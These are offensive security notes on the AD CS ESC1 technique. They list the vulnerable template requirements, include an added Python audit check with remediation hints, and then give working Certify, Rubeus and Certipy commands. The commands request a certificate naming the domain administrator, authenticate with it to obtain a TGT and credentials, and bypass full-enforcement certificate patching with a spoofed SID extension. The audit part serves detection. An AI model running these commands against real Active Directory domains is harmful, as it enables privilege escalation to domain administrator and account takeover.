ESC1
For this technique to work we need a certificate template with the following requirements:
- ENROLLEE_SUPPLIES_SUBJECT attribute enabled: this allows the user that initiated the CSR (certificate signing request) to specify any SAN (subjectAltName), allowing us to request a certificate as any user in the domain
- at least one of the following EKU OIDs: Smart Card Logon / PKINIT Authentication / Client Authentication
- a user with enrollment rights on the template
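An added audit check (not part of the original notes, and not Certify/Certipy code): given LDAP-style template records, it reports which of the requirements above a template meets and whether manager approval or authorized signatures would still block automatic issuance. The attribute names are the real AD template attributes; the sample records and their values are constructed.

```python
# Added ESC1 audit check, not code from the original notes or from Certify/Certipy.
# Input records mimic the AD template attributes; sample values are constructed.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1   # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x2           # bit in msPKI-Enrollment-Flag (manager approval)

# EKU OIDs that make an issued certificate usable for domain authentication
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
}
# Principals whose enrollment rights effectively open the template to any domain account
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}


def esc1_findings(t):
    """Return the ESC1 requirements (from the list above) that template t meets."""
    hits = []
    if t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        hits.append("enrollee supplies subject: SAN can name any account")
    auth = [AUTH_EKUS[o] for o in t["pKIExtendedKeyUsage"] if o in AUTH_EKUS]
    if auth:
        hits.append("authentication EKU: " + ", ".join(auth))
    broad = sorted(set(t["enroll_principals"]) & LOW_PRIV_PRINCIPALS)
    if broad:
        hits.append("enrollment open to: " + ", ".join(broad))
    return hits


def is_esc1(t):
    """True when all three requirements hold and nothing stops automatic issuance.
    Remediation: clear ENROLLEE_SUPPLIES_SUBJECT, or require manager approval /
    authorized signatures, or restrict enrollment to a dedicated group."""
    needs_approval = bool(t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS)
    needs_signature = t["msPKI-RA-Signature"] > 0
    return len(esc1_findings(t)) == 3 and not (needs_approval or needs_signature)


def _tmpl(name, name_flag, enroll_flag, ra_sig, ekus, principals):
    return {"name": name, "msPKI-Certificate-Name-Flag": name_flag,
            "msPKI-Enrollment-Flag": enroll_flag, "msPKI-RA-Signature": ra_sig,
            "pKIExtendedKeyUsage": ekus, "enroll_principals": principals}


SAMPLE_TEMPLATES = [  # constructed records, not dumped from a real domain
    _tmpl("Template1", 0x1, 0x0, 0, ["1.3.6.1.5.5.7.3.2"], ["Domain Users"]),
    _tmpl("User", 0xA6000000, 0x0, 0, ["1.3.6.1.5.5.7.3.2"], ["Domain Users"]),  # subject from AD
    _tmpl("Approved", 0x1, 0x2, 0, ["1.3.6.1.4.1.311.20.2.2"], ["Domain Users"]),  # manager approval
    _tmpl("AdminOnly", 0x1, 0x0, 0, ["1.3.6.1.5.2.3.4"], ["Domain Admins"]),
]
```

Only Template1 is flagged: the default-style User template builds the subject from AD, Approved requires manager approval, and AdminOnly is not enrollable by low-privileged principals.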
Windows
Certificate Request with alternative SAN
PS /home/bobbuilder> .\Certify.exe request /ca:LAB-DC.lab.local\lab-LAB-DC-CA /template:Template1 /altname:administrator@lab.local
Convert the certificate PEM to pfx
Certificate Authentication
PS /home/bobbuilder> .\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /getcredentials /nowrap
Linux
Certificate Request with alternative SAN
bobbuilder$ certipy req -u user1@local.lab -p "pass1" -ca lab-LOCAL-DC-CA -template Template1 -upn administrator@local.lab -dc-ip 10.10.10.10
bobbuilder$ certipy req -u user1@local.lab -p 'pass1' -ca lab-LOCAL-DC-CA -upn Administrator -template Template1 -dc-ip 10.10.10.10
Note: If we get the error "The NETBIOS connection with the remote host timed out", just try again.
Certificate Authentication
bobbuilder$ certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
ESC1 in CBA-Patched Environments
When working in an environment in which the CBA (Certificate-Based Authentication) patch is set to Full Enforcement, whenever a user requests a certificate for an alternate user, the SID of the requesting user is checked against the SID present in the szOID_NTDS_CA_SECURITY_EXT extension: if there is no match, this technique cannot be performed. So in a fully patched environment, the normal
PS /home/otter> .\Rubeus.exe asktgt /user:administrator /domain:minions.com /certificate:'C:\Temp\esc1.pfx' /password:'SomethingSecure123!' /dc:dc.minions.com /nowrap /ptt
would not work.
To work around this policy we can use Certify's built-in sidextension argument (present in Certipy as well under extensionsid):
PS /home/otter> .\Certify.exe request /ca:minions.com\CA-minions /template:<template_name> /altname:administrator /sidextension:<domain_sid>-500 /domain:minions.com
You can see more about how the extension works and its uses here.